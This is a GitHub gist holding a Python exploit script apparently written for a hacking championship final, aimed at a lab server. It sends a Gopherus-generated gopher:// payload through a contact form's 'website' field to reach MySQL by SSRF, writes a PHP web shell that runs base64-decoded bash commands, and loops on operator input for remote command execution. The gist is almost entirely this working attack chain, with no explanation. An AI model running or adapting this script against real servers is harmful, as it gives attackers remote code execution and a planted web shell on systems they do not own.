Created
October 19, 2020 23:16
-
-
Save c3l3si4n/d4192570a998722adc0a9e6b2bf1fb87 to your computer and use it in GitHub Desktop.
Ultimate Hacker Championship 17° Finals - Exploit Script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import string | |
import base64 | |
def attempt(payload): | |
data = {"contactName":"aa","contactEmail":"aa@a.com","website": payload,"contactMessage": "A" * 40} | |
r = requests.post('https://uhclabs.labdepentest.com.br/inc/sendEmail.php', data=data) | |
output = r.text | |
if 'went wrong.' in output: | |
print("error") | |
attempt(payload) | |
else: | |
for char in output: | |
if char in string.printable: | |
print(char, end='') | |
else: | |
print(' ', end='') | |
while True: | |
payload = input('> ') | |
print(payload) | |
payload = base64.b64encode(payload.encode()).decode() | |
write_file = """select '<?php system(\\"echo %s | base64 -d | bash\\");' into dumpfile '/uhc/celesian.php';""" % payload | |
payload = write_file | |
gen = "printf 'root\n'\"%s\n\" | python gopherus.py --exploit mysql | grep gopher: | sed 's/^.....//g'| cat" % payload | |
payload = __import__("os").popen(gen).read() | |
payload = payload.split('\x1b[0m\n')[0] | |
print(repr(payload)) | |
attempt(payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment